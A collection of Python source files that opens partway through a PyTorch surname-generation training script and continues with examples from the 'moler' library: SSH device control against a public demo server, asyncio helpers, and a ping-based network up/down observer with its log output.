:param sample_size: (int) the max length of the samples
:param temperature: (float) accentuates or flattens the distribution.
0.0 < temperature < 1.0 will make it peakier.
temperature > 1.0 will make it more uniform
:return: indices (torch.Tensor): the matrix of indices;
shape = (num_samples, sample_size)
"""
num_samples = len(nationalities)
begin_seq_index = [vectorizer.character_vocab.begin_seq_index
for _ in range(num_samples)]
begin_seq_index = torch.tensor(begin_seq_index,
dtype=torch.int64).unsqueeze(dim=1)
indices = [begin_seq_index]
nationality_indices = torch.tensor(nationalities, dtype=torch.int64).unsqueeze(dim=0)
h_t = model.nation_emb(nationality_indices)
for time_step in range(sample_size):
x_t = indices[time_step]
x_emb_t = model.char_emb(x_t)
rnn_out_t, h_t = model.rnn(x_emb_t, h_t)
prediction_vector = model.fc(rnn_out_t.squeeze(dim=1))
probability_vector = F.softmax(prediction_vector / temperature, dim=1)
indices.append(torch.multinomial(probability_vector, num_samples=1))
indices = torch.stack(indices).squeeze().permute(1, 0)
return indices
def decode_samples(sampled_indices, vectorizer):
decoded_surnames = []
vocab = vectorizer.character_vocab
for sampled_index in range(sampled_indices.shape[0]):
surname = ""
for time_step in range(sampled_indices.shape[1]):
sample_item = sampled_indices[sampled_index, time_step].item()
if sample_item == vocab.begin_seq_index:
continue
elif sample_item == vocab.end_seq_index:
break
else:
surname += vocab.lookup_index(sample_item)
decoded_surnames.append(surname)
return decoded_surnames
# Prep work
if args.expand_filepaths_to_save_dir:
if args.conditional:
args.save_dir += "conditional"
else:
args.save_dir += "unconditional"
args.vectorizer_file = os.path.join(args.save_dir, args.vectorizer_file)
args.model_state_file = os.path.join(args.save_dir, args.model_state_file)
print("Expanded filepaths:")
print("\t{}".format(args.vectorizer_file))
print("\t{}".format(args.model_state_file))
# Check CUDA
if not torch.cuda.is_available():
args.cuda = False
args.device = torch.device("cuda" if args.cuda else "cpu")
print("Using CUDA: {}".format(args.cuda))
# Set seed for reproducibility
helper.set_seed_everywhere(args.seed, args.cuda)
# handle dirs
helper.handle_dirs(args.save_dir)
# Initializations
if args.reload_from_files:
# training from a checkpoint
print("Loading dataset and vectorizer")
dataset = SurnameDataset.load_dataset_and_load_vectorizer(
args.surname_csv, args.vectorizer_file)
else:
print("Loading dataset and creating vectorizer")
# create dataset and vectorizer
dataset = SurnameDataset.load_dataset_and_make_vectorizer(args.surname_csv)
dataset.save_vectorizer(args.vectorizer_file)
vectorizer = dataset.get_vectorizer()
mask_index = vectorizer.character_vocab.mask_index
if args.conditional:
model = ConditionalGenerationModel(char_embedding_size=args.char_embedding_size,
char_vocab_size=len(vectorizer.character_vocab),
num_nationalities=len(vectorizer.nationality_vocab),
rnn_hidden_size=args.rnn_hidden_size,
padding_idx=mask_index)
else:
model = UnconditionalGenerationModel(char_embedding_size=args.char_embedding_size,
char_vocab_size=len(vectorizer.character_vocab),
rnn_hidden_size=args.rnn_hidden_size,
padding_idx=mask_index)
model = model.to(args.device)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer,
mode="min",
factor=0.5,
patience=1)
train_state = helper.make_train_state(args)
epoch_bar = tqdm_notebook(desc="training routine",
total=args.num_epochs,
position=0)
dataset.set_split("train")
train_bar = tqdm_notebook(desc="split=train",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
dataset.set_split("val")
val_bar = tqdm_notebook(desc="split=val",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
try:
for epoch_index in range(args.num_epochs):
train_state["epoch_index"] = epoch_index
dataset.set_split("train")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.0
running_acc = 0.0
model.train()
for batch_index, batch_dict in enumerate(batch_generator):
optimizer.zero_grad()
if args.conditional:
y_pred = model(x_in=batch_dict["x_data"],
nationality_index=batch_dict["class_index"])
else:
y_pred = model(x_in=batch_dict["x_data"])
loss = helper.sequence_loss(y_pred, batch_dict["y_target"], mask_index)
loss.backward()
optimizer.step()
running_loss += (loss.item() - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"], mask_index)
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
train_bar.update()
train_state["train_loss"].append(running_loss)
train_state["train_acc"].append(running_acc)
dataset.set_split("val")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.0
running_acc = 0.0
model.eval()
for batch_index, batch_dict in enumerate(batch_generator):
if args.conditional:
y_pred = model(x_in=batch_dict["x_data"],
nationality_index=batch_dict["class_index"])
else:
y_pred = model(x_in=batch_dict["x_data"])
loss = helper.sequence_loss(y_pred, batch_dict["y_target"], mask_index)
running_loss += (loss.item() - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"], mask_index)
running_acc += (acc_t - running_acc) / (batch_index + 1)
val_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
val_bar.update()
train_state["val_loss"].append(running_loss)
train_state["val_acc"].append(running_acc)
train_state = helper.update_train_state(args=args,
model=model,
train_state=train_state)
scheduler.step(train_state["val_loss"][-1])
if train_state["stop_early"]:
break
model = model.cpu()
if args.conditional:
nationalities = np.random.choice(
np.arange(len(vectorizer.nationality_vocab)), replace=True, size=2)
sampled_surnames = decode_samples(
sample_from_conditional_model(model, vectorizer, nationalities),
vectorizer)
sample1 = "{}->{}".format(vectorizer.nationality_vocab.lookup_index(nationalities[0]),
sampled_surnames[0])
sample2 = "{}->{}".format(vectorizer.nationality_vocab.lookup_index(nationalities[1]),
sampled_surnames[1])
else:
sampled_surnames = decode_samples(
sample_from_unconditional_model(model, vectorizer, num_samples=20),
vectorizer)
sample1 = sampled_surnames[0]
sample2 = sampled_surnames[1]
epoch_bar.set_postfix(sample1=sample1, sample2=sample2)
model = model.to(args.device)
print(f"Epoch {epoch_index + 1}:")
print(f"\ttrain_acc = {train_state['train_acc'][-1]}"
f"\tval_acc = {train_state['val_acc'][-1]}")
print(f"\tsample1: {sample1}\tsample2: {sample2}")
train_bar.n = 0
val_bar.n = 0
epoch_bar.update()
except KeyboardInterrupt:
print("Exiting loop")
model.load_state_dict(torch.load(train_state["model_filename"]))
model = model.to(args.device)
dataset.set_split("test")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.0
running_acc = 0.0
model.eval()
for batch_index, batch_dict in enumerate(batch_generator):
if args.conditional:
y_pred = model(x_in=batch_dict["x_data"],
nationality_index=batch_dict["class_index"])
else:
y_pred = model(x_in=batch_dict["x_data"])
loss = helper.sequence_loss(y_pred, batch_dict["y_target"], mask_index)
running_loss += (loss.item() - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"], mask_index)
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_state["test_loss"] = running_loss
train_state["test_acc"] = running_acc
print(f"Test loss: {train_state['test_loss']}")
print(f"Test acc: {train_state['test_acc']}")
# Inference
model = model.cpu()
if args.conditional:
for index in range(len(vectorizer.nationality_vocab)):
nationality = vectorizer.nationality_vocab.lookup_index(index)
print("Sampled for {}:".format(nationality))
sampled_indices = sample_from_conditional_model(model,
vectorizer,
nationalities=[index]*3,
temperature=0.7)
for sampled_surname in decode_samples(sampled_indices, vectorizer):
print("\t"+sampled_surname)
else:
sampled_surnames = decode_samples(
sample_from_unconditional_model(model, vectorizer, num_samples=20),
vectorizer)
print("-" * 10)
for sampled_surname in sampled_surnames:
print(sampled_surname)
```
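A standalone sketch (toy numbers, not from the repo) of the temperature behaviour described in the sampling docstrings above: dividing the logits by a temperature below 1.0 sharpens the softmax, while a temperature above 1.0 flattens it toward uniform.
```python
# Illustrative sketch: effect of temperature on the softmax used for sampling.
import torch
import torch.nn.functional as F

logits = torch.tensor([[2.0, 1.0, 0.1]])
for temperature in (0.5, 1.0, 2.0):
    print(temperature, F.softmax(logits / temperature, dim=1))
# 0.5 -> most of the probability mass on the first index (peakier)
# 2.0 -> probabilities move toward 1/3 each (more uniform)
```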
{
"source": "jochenparm/moler",
"score": 2
} |
#### File: examples/command/unix_ls_on_device_async.py
```python
import asyncio
import logging
import sys
import moler.config.runners
from moler.config import load_config
from moler.device.device import DeviceFactory
def configure_logging():
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-45s | %(threadName)22s |%(message)s',
# format=' |%(name)-45s | %(threadName)12s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
def _cleanup_remaining_tasks(loop, logger):
# https://stackoverflow.com/questions/30765606/whats-the-correct-way-to-clean-up-after-an-interrupted-event-loop
# https://medium.com/python-pandemonium/asyncio-coroutine-patterns-beyond-await-a6121486656f
# Handle shutdown gracefully by waiting for all tasks to be cancelled
not_done_tasks = [task for task in asyncio.Task.all_tasks(loop=loop) if not task.done()]
if not_done_tasks:
logger.info("cancelling all remaining tasks")
# NOTE: following code cancels all tasks - possibly not ours as well
remaining_tasks = asyncio.gather(*not_done_tasks, loop=loop, return_exceptions=True)
remaining_tasks.add_done_callback(lambda t: loop.stop())
logger.debug("remaining tasks = {}".format(not_done_tasks))
remaining_tasks.cancel()
# Keep the event loop running until it is either destroyed or all
# tasks have really terminated
loop.run_until_complete(remaining_tasks)
def run_via_asyncio(async_to_run, debug_event_loop=False):
logger = logging.getLogger('asyncio.main')
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = asyncio.get_event_loop()
event_loop.set_debug(enabled=debug_event_loop)
try:
logger.info("starting events loop ...")
event_loop.run_until_complete(async_to_run)
_cleanup_remaining_tasks(loop=event_loop, logger=logger)
finally:
logger.info("closing events loop ...")
event_loop.close()
logger.info("... events loop closed")
# configure library directly from dict
load_config(config={'DEVICES': {'DEFAULT_CONNECTION':
{'CONNECTION_DESC': {'io_type': 'terminal', 'variant': 'asyncio-in-thread'}},
'RebexTestMachine':
{'DEVICE_CLASS': 'moler.device.unixremote.UnixRemote',
'CONNECTION_HOPS': {'UNIX_LOCAL':
{'UNIX_REMOTE':
{'execute_command': 'ssh',
'command_params': {'expected_prompt': 'demo@',
'host': 'test.rebex.net',
'login': 'demo',
'password': 'password',
'set_timeout': None}}}}}}},
config_type='dict')
configure_logging()
moler.config.runners.set_default_variant(variant='asyncio-in-thread')
# TODO: problem for {'CONNECTION_DESC': {'io_type': 'terminal', 'variant': 'asyncio'}},
# TODO: get_device() uses io.open() and not await open()
# async def do_async_device_ls():
# remote_unix = await DeviceFactory.get_device_coro(name='RebexTestMachine')
# remote_unix = await AsyncDeviceFactory.get_device(name='RebexTestMachine')
# # TODO: + textualdevice should have separate __init__() and async def open()
# await remote_unix.goto_state_coro(state="UNIX_REMOTE")
# ls_cmd = remote_unix.get_cmd(cmd_name="ls", cmd_params={"options": "-l"})
# remote_files = await ls_cmd
#
# run_via_asyncio(do_async_device_ls())
remote_unix = DeviceFactory.get_device(name='RebexTestMachine') # it starts in local shell
remote_unix.goto_state(state="UNIX_REMOTE") # make it go to remote shell
ls_cmd = remote_unix.get_cmd(cmd_name="ls", cmd_params={"options": "-l"})
remote_files = ls_cmd()
if 'readme.txt' in remote_files['files']:
print("readme.txt file:")
readme_file_info = remote_files['files']['readme.txt']
for attr in readme_file_info:
print(" {:<18}: {}".format(attr, readme_file_info[attr]))
# result:
"""
readme.txt file:
permissions : -rw-------
hard_links_count : 1
owner : demo
group : users
size_raw : 403
size_bytes : 403
date : Apr 08 2014
name : readme.txt
"""
```
#### File: layer_3/asyncio/asyncio_common.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import sys
import asyncio
def configure_logging():
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-45s | %(threadName)12s |%(message)s',
# format=' |%(name)-45s | %(threadName)12s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
def _cleanup_remaining_tasks(loop, logger):
# https://stackoverflow.com/questions/30765606/whats-the-correct-way-to-clean-up-after-an-interrupted-event-loop
# https://medium.com/python-pandemonium/asyncio-coroutine-patterns-beyond-await-a6121486656f
# Handle shutdown gracefully by waiting for all tasks to be cancelled
not_done_tasks = [task for task in asyncio.Task.all_tasks(loop=loop) if not task.done()]
if not_done_tasks:
logger.info("cancelling all remaining tasks")
# NOTE: following code cancels all tasks - possibly not ours as well
remaining_tasks = asyncio.gather(*not_done_tasks, loop=loop, return_exceptions=True)
remaining_tasks.add_done_callback(lambda t: loop.stop())
logger.debug("remaining tasks = {}".format(not_done_tasks))
remaining_tasks.cancel()
# Keep the event loop running until it is either destroyed or all
# tasks have really terminated
loop.run_until_complete(remaining_tasks)
def run_via_asyncio(async_to_run, debug_event_loop=False):
logger = logging.getLogger('asyncio.main')
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = asyncio.get_event_loop()
event_loop.set_debug(enabled=debug_event_loop)
try:
logger.info("starting events loop ...")
event_loop.run_until_complete(async_to_run)
_cleanup_remaining_tasks(loop=event_loop, logger=logger)
finally:
logger.info("closing events loop ...")
event_loop.close()
logger.info("... events loop closed")
```
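A minimal usage sketch (not from the repo) of the helpers above: define a trivial coroutine and hand it to `run_via_asyncio`, which owns the event-loop lifecycle and cancels leftover tasks on the way out. Note that `_cleanup_remaining_tasks` relies on `asyncio.Task.all_tasks(loop=...)`, so this targets the older Python versions these examples were written for.
```python
# Illustrative sketch: driving a trivial coroutine through the helpers above
# (assumes configure_logging and run_via_asyncio from asyncio_common are in scope).
import asyncio

async def say_hello():
    await asyncio.sleep(0.1)
    print("hello from the asyncio helper")

if __name__ == '__main__':
    configure_logging()
    run_via_asyncio(say_hello())
```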
#### File: layer_3/asyncio/asyncio_in_thread_runner_with_raw_functions.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import sys
import os
import threading
import time
from moler.connection_factory import get_connection
from moler.exceptions import ConnectionObserverTimeout
from moler.runner_factory import get_runner
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "..")) # allow finding modules in examples/
from network_toggle_observers import NetworkDownDetector, NetworkUpDetector
# ===================== Moler's connection-observer usage ======================
def ping_observing_task(ext_io_connection, ping_ip):
"""
Here the external-IO connection is abstract - we don't know its type.
All we know is that it has a .moler_connection attribute.
"""
logger = logging.getLogger('moler.user.app-code')
conn_addr = str(ext_io_connection)
# Layer 2 of Moler's usage (ext_io_connection + runner):
# 3. create observers on Moler's connection
net_down_detector = NetworkDownDetector(ping_ip,
connection=ext_io_connection.moler_connection,
runner=get_runner(variant="asyncio-in-thread"))
net_up_detector = NetworkUpDetector(ping_ip,
connection=ext_io_connection.moler_connection,
runner=get_runner(variant="asyncio-in-thread"))
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_down_detector)
logger.debug('observe ' + info)
# 4. start observer (nonblocking, using as future)
net_down_detector.start() # should be started before we open connection
# to not lose the first data on the connection
with ext_io_connection:
# 5. await that observer to complete
try:
net_down_time = net_down_detector.await_done(timeout=10) # =2 --> TimeoutError
timestamp = time.strftime("%H:%M:%S", time.localtime(net_down_time))
logger.debug('Network {} is down from {}'.format(ping_ip, timestamp))
except ConnectionObserverTimeout:
logger.debug('Network down detector timed out')
# 6. call next observer (blocking till completes)
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_up_detector)
logger.debug('observe ' + info)
# using as synchronous function (so we want verb to express action)
detect_network_up = net_up_detector
net_up_time = detect_network_up() # if you want timeout - see code above
timestamp = time.strftime("%H:%M:%S", time.localtime(net_up_time))
logger.debug('Network {} is back "up" from {}'.format(ping_ip, timestamp))
logger.debug('exiting ping_observing_task({})'.format(ping_ip))
# ==============================================================================
def main(connections2observe4ip):
logger = logging.getLogger('asyncio.main')
logger.debug('starting jobs observing connections')
# Starting the clients
jobs_on_connections = []
for connection_name, ping_ip in connections2observe4ip:
# ------------------------------------------------------------------
# This front-end code hides all details of the connection.
# We just use its name - such a name should be meaningful for the user,
# like: "main_dns_server", "backup_ntp_server", ...
# In other words, all we want here is something like:
# "give me a connection to main_dns_server"
# ------------------------------------------------------------------
# con_logger = logging.getLogger('tcp-async_in_thrd-io.{}'.format(connection_name))
# tcp_connection = get_connection(name=connection_name, variant='asyncio-in-thread', logger=con_logger)
tcp_connection = get_connection(name=connection_name, variant='asyncio-in-thread')
client_thread = threading.Thread(target=ping_observing_task,
args=(tcp_connection, ping_ip))
client_thread.start()
jobs_on_connections.append(client_thread)
# wait for the observers' jobs to be done
for client_thread in jobs_on_connections:
client_thread.join()
logger.debug('all jobs observing connections are done')
# ==============================================================================
if __name__ == '__main__':
from threaded_ping_server import start_ping_servers, stop_ping_servers
from asyncio_common import configure_logging
import os
from moler.config import load_config
# -------------------------------------------------------------------
# Configure moler connections (backend code)
# 1) configure variant by YAML config file
# 2) ver.2 - configure named connections by YAML config file
load_config(config=os.path.join(os.path.dirname(__file__), "..", "named_connections.yml"))
# 3) take the default class used to realize the tcp-threaded connection
# -------------------------------------------------------------------
configure_logging()
net_1 = ('localhost', 5671)
net_2 = ('localhost', 5672)
connections2serve = [(net_1, '10.0.2.15'),
(net_2, '10.0.2.16')]
connections2observe4ip = [('net_1', '10.0.2.15'),
('net_2', '10.0.2.16')]
servers = start_ping_servers(connections2serve)
try:
main(connections2observe4ip)
finally:
stop_ping_servers(servers)
'''
LOG OUTPUT
15:28:23 |threaded.ping.tcp-server(5671) | MainThread |Ping Sim started at tcp://localhost:5671
15:28:23 |threaded.ping.tcp-server(5672) | MainThread |Ping Sim started at tcp://localhost:5672
15:28:23 |asyncio.main | MainThread |starting jobs observing connections
15:28:23 |moler.runner.asyncio-in-thrd:0 | Thread-3 |created AsyncioInThreadRunner:139990601181112
15:28:23 |moler.user.app-code | Thread-3 |observe 10.0.2.15 on tcp://localhost:5671 using NetworkDownDetector(id:7f521a0e27f0)
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |go background: NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:23 |asyncio | Thread-3 |Using selector: EpollSelector
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |created loop 4 thread: 139990601182008:<_UnixSelectorEventLoop running=False closed=False debug=False>
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |created thread <TillDoneThread(Thread-5, initial)> with loop 139990601182008:<_UnixSelectorEventLoop running=False closed=False debug=True>
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-5 |starting new asyncio-in-thrd loop ...
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |started new asyncio-in-thrd loop ...
15:28:23 |moler.user.app-code | Thread-4 |observe 10.0.2.16 on tcp://localhost:5672 using NetworkDownDetector(id:7f521a0d6710)
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-4 |go background: NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |will await stop_event ...
15:28:23 |moler.NetworkDownDetector(id:7f521a0d6710) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |START OF feed(NetworkDownDetector(id:7f521a0d6710))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |start feeding(NetworkDownDetector(id:7f521a0d6710))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed subscribing for data NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feeding(NetworkDownDetector(id:7f521a0d6710)) started
15:28:23 |moler.NetworkDownDetector(id:7f521a0e27f0) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |START OF feed(NetworkDownDetector(id:7f521a0e27f0))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |start feeding(NetworkDownDetector(id:7f521a0e27f0))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed subscribing for data NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feeding(NetworkDownDetector(id:7f521a0e27f0)) started
15:28:23 |threaded.ping.tcp-server(5672 -> 43373) | Thread-6 |connection accepted - client at tcp://127.0.0.1:43373
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-4 |go foreground: NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>]) - await max. 10 [sec]
15:28:23 |moler.net_2 | Thread-7 |
15:28:23 |threaded.ping.tcp-server(5671 -> 49571) | Thread-8 |connection accepted - client at tcp://127.0.0.1:49571
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-3 |go foreground: NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>]) - await max. 10 [sec]
15:28:23 |moler.net_1 | Thread-9 |
15:28:24 |moler.net_2 | Thread-7 |greg@debian:~$ ping 10.0.2.16
15:28:24 |moler.net_1 | Thread-9 |greg@debian:~$ ping 10.0.2.15
15:28:25 |moler.net_2 | Thread-7 |PING 10.0.2.16 (10.0.2.16) 56(84) bytes of data.
15:28:25 |moler.net_1 | Thread-9 |PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.
15:28:26 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=1 ttl=64 time=0.080 ms
15:28:26 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms
15:28:27 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=2 ttl=64 time=0.037 ms
15:28:27 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms
15:28:28 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=3 ttl=64 time=0.045 ms
15:28:28 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
15:28:29 |moler.net_2 | Thread-7 |ping: sendmsg: Network is unreachable
15:28:29 |moler.NetworkDownDetector(id:7f521a0d6710) | Thread-7 |Network 10.0.2.16 is down!
15:28:29 |moler.net_1 | Thread-9 |ping: sendmsg: Network is unreachable
15:28:29 |moler.NetworkDownDetector(id:7f521a0e27f0) | Thread-9 |Network 10.0.2.15 is down!
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed done & unsubscribing NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |END OF feed(NetworkDownDetector(id:7f521a0d6710))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed returning result: 1541514509.3102295
15:28:29 |moler.NetworkDownDetector(id:7f521a0d6710) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed done & unsubscribing NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |END OF feed(NetworkDownDetector(id:7f521a0e27f0))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed returning result: 1541514509.311799
15:28:29 |moler.NetworkDownDetector(id:7f521a0e27f0) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-3 |NetworkDownDetector(id:7f521a0e27f0) returned 1541514509.311799
15:28:29 |moler.user.app-code | Thread-3 |Network 10.0.2.15 is down from 15:28:29
15:28:29 |moler.user.app-code | Thread-3 |observe 10.0.2.15 on tcp://localhost:5671 using NetworkUpDetector(id:7f521a0e2ba8)
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0e2ba8 | Thread-3 |go background: NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0e2ba8 | Thread-4 |NetworkDownDetector(id:7f521a0d6710) returned 1541514509.3102295
15:28:29 |moler.user.app-code | Thread-4 |Network 10.0.2.16 is down from 15:28:29
15:28:29 |moler.user.app-code | Thread-4 |observe 10.0.2.16 on tcp://localhost:5672 using NetworkUpDetector(id:7f521a0d6860)
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-4 |go background: NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:29 |asyncio | Thread-5 |poll took 1.560 ms: 1 events
15:28:29 |moler.NetworkUpDetector(id:7f521a0e2ba8) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |START OF feed(NetworkUpDetector(id:7f521a0e2ba8))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |start feeding(NetworkUpDetector(id:7f521a0e2ba8))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed subscribing for data NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feeding(NetworkUpDetector(id:7f521a0e2ba8)) started
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-3 |go foreground: NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>]) - await max. None [sec]
15:28:29 |moler.NetworkUpDetector(id:7f521a0d6860) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |START OF feed(NetworkUpDetector(id:7f521a0d6860))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |start feeding(NetworkUpDetector(id:7f521a0d6860))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed subscribing for data NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feeding(NetworkUpDetector(id:7f521a0d6860)) started
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-4 |go foreground: NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>]) - await max. None [sec]
15:28:30 |moler.net_2 | Thread-7 |ping: sendmsg: Network is unreachable
15:28:30 |moler.net_1 | Thread-9 |ping: sendmsg: Network is unreachable
15:28:31 |moler.net_2 | Thread-7 |ping: sendmsg: Network is unreachable
15:28:31 |moler.net_1 | Thread-9 |ping: sendmsg: Network is unreachable
15:28:32 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms
15:28:32 |moler.NetworkUpDetector(id:7f521a0e2ba8) | Thread-9 |Network 10.0.2.15 is up!
